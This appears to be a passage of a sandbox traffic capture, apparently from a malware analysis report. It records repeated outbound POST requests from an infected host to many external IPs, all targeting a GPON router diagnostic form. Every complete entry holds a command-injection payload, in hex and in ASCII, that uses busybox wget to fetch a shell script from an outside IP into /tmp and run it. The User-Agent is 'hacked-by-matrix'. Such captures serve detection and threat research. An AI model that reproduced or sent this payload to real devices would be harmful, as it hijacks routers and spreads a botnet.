                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1269192.168.2.1342066109.149.142.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715606928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1270192.168.2.1340656109.16.161.31443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715636969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1271192.168.2.1360496118.253.224.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715643883 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1272192.168.2.1335754109.225.81.181443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715660095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1273192.168.2.1336746109.79.92.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715665102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1274192.168.2.1352876109.232.80.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715670109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1275192.168.2.1358924212.206.34.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715703011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1276192.168.2.1349122109.88.97.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715708971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1277192.168.2.135334042.36.18.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715714931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1278192.168.2.135409442.107.47.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715730906 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1279192.168.2.134597042.219.51.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715742111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1280192.168.2.133317042.107.73.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715754986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1281192.168.2.133661642.142.42.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715764046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1282192.168.2.1333488212.9.37.25443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715789080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1283192.168.2.1354090212.255.227.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715799093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1284192.168.2.1358568109.109.99.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715820074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1285192.168.2.1351726109.17.93.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715827942 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1286192.168.2.1343428109.184.199.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715840101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1287192.168.2.13592905.42.196.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715862036 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1288192.168.2.1333570212.100.12.65443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715873957 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1289192.168.2.133896442.103.220.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715898037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1290192.168.2.13577885.62.63.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715924025 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1291192.168.2.1335504212.62.236.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715950966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
